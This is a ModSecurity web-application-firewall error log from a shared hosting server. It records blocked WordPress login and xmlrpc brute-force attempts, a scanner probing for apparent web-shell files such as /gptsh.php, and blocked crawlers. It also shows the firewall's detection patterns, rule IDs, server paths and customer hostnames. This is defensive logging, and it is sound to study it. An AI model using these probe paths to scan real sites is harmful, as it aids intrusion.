[Tue May 26 17:22:56.197578 2026] [security2:error] [pid 882219:tid 882387] [client 104.43.242.179:8282] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/aaf.php"] [unique_id "ahWJmJ8tTkZcqimiXcTvVgAAAKs"]
[Tue May 26 17:22:56.906441 2026] [security2:error] [pid 882219:tid 882431] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJmJ8tTkZcqimiXcTvYgAAANc"]
[Tue May 26 17:22:59.099216 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:1374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJm58tTkZcqimiXcTvoAAAAKQ"]
[Tue May 26 17:22:59.099386 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:1374] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJm58tTkZcqimiXcTvoAAAAKQ"]
[Tue May 26 17:22:59.204726 2026] [security2:error] [pid 882219:tid 882448] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJmp8tTkZcqimiXcTvlwAAAOg"]
[Tue May 26 17:23:00.232572 2026] [security2:error] [pid 882219:tid 882316] [remote 5.78.119.122:53074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWJnJ8tTkZcqimiXcTvvwAAl2A"]
[Tue May 26 17:23:00.642786 2026] [security2:error] [pid 882219:tid 882424] [client 104.43.242.179:8311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/wander.php"] [unique_id "ahWJnJ8tTkZcqimiXcTvzAAAANA"]
[Tue May 26 17:23:00.642945 2026] [security2:error] [pid 882219:tid 882424] [client 104.43.242.179:8311] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/wander.php"] [unique_id "ahWJnJ8tTkZcqimiXcTvzAAAANA"]
[Tue May 26 17:23:01.150111 2026] [security2:error] [pid 882219:tid 882379] [client 14.242.168.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJnJ8tTkZcqimiXcTv1QAAAKM"]
[Tue May 26 17:23:01.336179 2026] [security2:error] [pid 882219:tid 882461] [client 203.194.101.7:51981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJnZ8tTkZcqimiXcTv4wAAAPU"]
[Tue May 26 17:23:01.336314 2026] [security2:error] [pid 882219:tid 882461] [client 203.194.101.7:51981] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJnZ8tTkZcqimiXcTv4wAAAPU"]
[Tue May 26 17:23:01.562343 2026] [security2:error] [pid 882219:tid 882474] [client 104.43.242.179:8215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/gptsh.php"] [unique_id "ahWJnZ8tTkZcqimiXcTv7AAAAQI"]
[Tue May 26 17:23:01.562452 2026] [security2:error] [pid 882219:tid 882474] [client 104.43.242.179:8215] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/gptsh.php"] [unique_id "ahWJnZ8tTkZcqimiXcTv7AAAAQI"]
[Tue May 26 17:23:01.618238 2026] [security2:error] [pid 882219:tid 882431] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJnZ8tTkZcqimiXcTv3AAAANc"]
[Tue May 26 17:23:02.776757 2026] [security2:error] [pid 882219:tid 882374] [client 104.43.242.179:8261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/xocx.php"] [unique_id "ahWJnp8tTkZcqimiXcTwBQAAAJ4"]
[Tue May 26 17:23:02.776871 2026] [security2:error] [pid 882219:tid 882374] [client 104.43.242.179:8261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/xocx.php"] [unique_id "ahWJnp8tTkZcqimiXcTwBQAAAJ4"]
[Tue May 26 17:23:03.820790 2026] [security2:error] [pid 882219:tid 882451] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJn58tTkZcqimiXcTwEQAAAOs"]
[Tue May 26 17:23:04.227660 2026] [security2:error] [pid 882219:tid 882470] [client 104.43.242.179:8287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/155.php"] [unique_id "ahWJoJ8tTkZcqimiXcTwJgAAAP4"]
[Tue May 26 17:23:04.227757 2026] [security2:error] [pid 882219:tid 882470] [client 104.43.242.179:8287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/155.php"] [unique_id "ahWJoJ8tTkZcqimiXcTwJgAAAP4"]
[Tue May 26 17:23:04.373742 2026] [security2:error] [pid 882219:tid 882329] [remote 5.42.158.148:60610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWJoJ8tTkZcqimiXcTwJQAA6m0"]
[Tue May 26 17:23:04.815675 2026] [security2:error] [pid 882219:tid 882460] [client 104.43.242.179:8192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/colay.php"] [unique_id "ahWJoJ8tTkZcqimiXcTwNgAAAPQ"]
[Tue May 26 17:23:04.815799 2026] [security2:error] [pid 882219:tid 882460] [client 104.43.242.179:8192] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/colay.php"] [unique_id "ahWJoJ8tTkZcqimiXcTwNgAAAPQ"]
[Tue May 26 17:23:05.766203 2026] [security2:error] [pid 882219:tid 882417] [client 104.43.242.179:5061] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/hly.php"] [unique_id "ahWJoZ8tTkZcqimiXcTwVQAAAMk"]
[Tue May 26 17:23:05.766309 2026] [security2:error] [pid 882219:tid 882417] [client 104.43.242.179:5061] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/hly.php"] [unique_id "ahWJoZ8tTkZcqimiXcTwVQAAAMk"]
[Tue May 26 17:23:06.390050 2026] [security2:error] [pid 882219:tid 882443] [client 104.43.242.179:8193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/ppp.php"] [unique_id "ahWJop8tTkZcqimiXcTwZAAAAOM"]
[Tue May 26 17:23:06.390173 2026] [security2:error] [pid 882219:tid 882443] [client 104.43.242.179:8193] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/ppp.php"] [unique_id "ahWJop8tTkZcqimiXcTwZAAAAOM"]
[Tue May 26 17:23:06.744285 2026] [security2:error] [pid 882219:tid 882450] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJop8tTkZcqimiXcTwYwAAAOo"]
[Tue May 26 17:23:07.021410 2026] [security2:error] [pid 882219:tid 882367] [client 104.43.242.179:8280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpha-bau.net"] [uri "/201.php"] [unique_id "ahWJo58tTkZcqimiXcTwdAAAAJc"]
[Tue May 26 17:23:07.021517 2026] [security2:error] [pid 882219:tid 882367] [client 104.43.242.179:8280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "alpha-bau.net"] [uri "/201.php"] [unique_id "ahWJo58tTkZcqimiXcTwdAAAAJc"]
[Tue May 26 17:23:09.020154 2026] [security2:error] [pid 882219:tid 882441] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJpJ8tTkZcqimiXcTwlQAAAOE"]
[Tue May 26 17:23:10.874154 2026] [security2:error] [pid 882219:tid 882439] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJpp8tTkZcqimiXcTwwQAAAN8"]
[Tue May 26 17:23:11.472093 2026] [security2:error] [pid 882219:tid 882399] [client 223.235.98.214:30584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJp58tTkZcqimiXcTw0gAAALc"]
[Tue May 26 17:23:11.472224 2026] [security2:error] [pid 882219:tid 882399] [client 223.235.98.214:30584] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJp58tTkZcqimiXcTw0gAAALc"]
[Tue May 26 17:23:11.755807 2026] [security2:error] [pid 882219:tid 882390] [client 203.194.101.7:52325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJp58tTkZcqimiXcTw2QAAAK4"]
[Tue May 26 17:23:11.755931 2026] [security2:error] [pid 882219:tid 882390] [client 203.194.101.7:52325] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJp58tTkZcqimiXcTw2QAAAK4"]
[Tue May 26 17:23:13.014383 2026] [security2:error] [pid 882219:tid 882383] [client 185.191.171.17:65050] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWJqZ8tTkZcqimiXcTxAQAAAKc"]
[Tue May 26 17:23:13.014509 2026] [security2:error] [pid 882219:tid 882383] [client 185.191.171.17:65050] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWJqZ8tTkZcqimiXcTxAQAAAKc"]
[Tue May 26 17:23:13.126400 2026] [security2:error] [pid 882219:tid 882358] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJqJ8tTkZcqimiXcTw9wAAAI4"]
[Tue May 26 17:23:15.290759 2026] [security2:error] [pid 882219:tid 882457] [client 69.58.89.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJqp8tTkZcqimiXcTxHwAAAPE"], referer: https://www.anujtradingco.com/
[Tue May 26 17:23:15.930406 2026] [security2:error] [pid 882219:tid 882376] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJq58tTkZcqimiXcTxSwAAAKA"]
[Tue May 26 17:23:16.222125 2026] [security2:error] [pid 882219:tid 882282] [remote 136.110.38.51:47920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWJrJ8tTkZcqimiXcTxVgAA9T4"]
[Tue May 26 17:23:16.581530 2026] [security2:error] [pid 882219:tid 882460] [client 69.58.89.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJrJ8tTkZcqimiXcTxXwAAAPQ"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1238221&moderation-hash=7ea5cf9fc7ed18cce4aa8ea53ab838d3
[Tue May 26 17:23:16.696929 2026] [security2:error] [pid 882219:tid 882373] [client 80.225.239.126:46010] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "jetstarprojects.com"] [uri "/"] [unique_id "ahWJrJ8tTkZcqimiXcTxaQAAAJ0"]
[Tue May 26 17:23:17.341935 2026] [autoindex:error] [pid 882219:tid 882446] [client 45.154.98.38:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:23:17.498046 2026] [security2:error] [pid 882219:tid 882423] [client 45.154.98.38:61543] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWJrZ8tTkZcqimiXcTxegAAAM8"]
[Tue May 26 17:23:18.109349 2026] [security2:error] [pid 882219:tid 882264] [remote 172.104.164.56:53628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWJrZ8tTkZcqimiXcTxiQAA6yw"]
[Tue May 26 17:23:18.341129 2026] [security2:error] [pid 882219:tid 882385] [client 45.154.98.38:57167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/xmlrpc.php"] [unique_id "ahWJrp8tTkZcqimiXcTxjwAAAKk"]
[Tue May 26 17:23:18.735708 2026] [security2:error] [pid 882219:tid 882350] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJrp8tTkZcqimiXcTxkwAAAIY"]
[Tue May 26 17:23:18.996479 2026] [security2:error] [pid 882219:tid 882403] [client 45.154.98.38:60324] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWJrp8tTkZcqimiXcTxsQAAALs"]
[Tue May 26 17:23:19.503375 2026] [security2:error] [pid 882219:tid 882249] [remote 209.42.18.223:45486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWJr58tTkZcqimiXcTxuwAA8R0"]
[Tue May 26 17:23:19.642289 2026] [security2:error] [pid 882219:tid 882417] [client 69.58.89.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJr58tTkZcqimiXcTxxQAAAMk"], referer: https://anujtradingco.com
[Tue May 26 17:23:20.245535 2026] [security2:error] [pid 882219:tid 882371] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJr58tTkZcqimiXcTxzgAAAJs"]
[Tue May 26 17:23:20.320897 2026] [security2:error] [pid 882219:tid 882409] [client 47.128.21.140:44868] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahWJsJ8tTkZcqimiXcTx2wAAAME"]
[Tue May 26 17:23:20.815747 2026] [security2:error] [pid 882219:tid 882428] [client 45.154.98.38:55094] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWJsJ8tTkZcqimiXcTx7AAAANQ"]
[Tue May 26 17:23:21.551552 2026] [security2:error] [pid 882219:tid 882435] [client 45.154.98.38:65431] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWJsZ8tTkZcqimiXcTyBAAAANs"]
[Tue May 26 17:23:21.980771 2026] [security2:error] [pid 882219:tid 882449] [client 203.194.101.7:52669] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJsZ8tTkZcqimiXcTyDgAAAOk"]
[Tue May 26 17:23:21.980944 2026] [security2:error] [pid 882219:tid 882449] [client 203.194.101.7:52669] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJsZ8tTkZcqimiXcTyDgAAAOk"]
[Tue May 26 17:23:22.156769 2026] [security2:error] [pid 882219:tid 882438] [client 45.154.98.38:57553] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWJsp8tTkZcqimiXcTyEgAAAN4"]
[Tue May 26 17:23:22.791974 2026] [security2:error] [pid 882219:tid 882368] [client 45.154.98.38:50990] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWJsp8tTkZcqimiXcTyIAAAAJg"]
[Tue May 26 17:23:23.340734 2026] [security2:error] [pid 882219:tid 882351] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJsp8tTkZcqimiXcTyJwAAAIc"]
[Tue May 26 17:23:23.524148 2026] [security2:error] [pid 882219:tid 882382] [client 45.154.98.38:56963] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWJs58tTkZcqimiXcTyMwAAAKY"]
[Tue May 26 17:23:24.143375 2026] [security2:error] [pid 882219:tid 882364] [client 45.154.98.38:58590] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWJtJ8tTkZcqimiXcTyQgAAAJQ"]
[Tue May 26 17:23:24.870349 2026] [security2:error] [pid 882219:tid 882363] [client 45.154.98.38:61509] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWJtJ8tTkZcqimiXcTyUgAAAJM"]
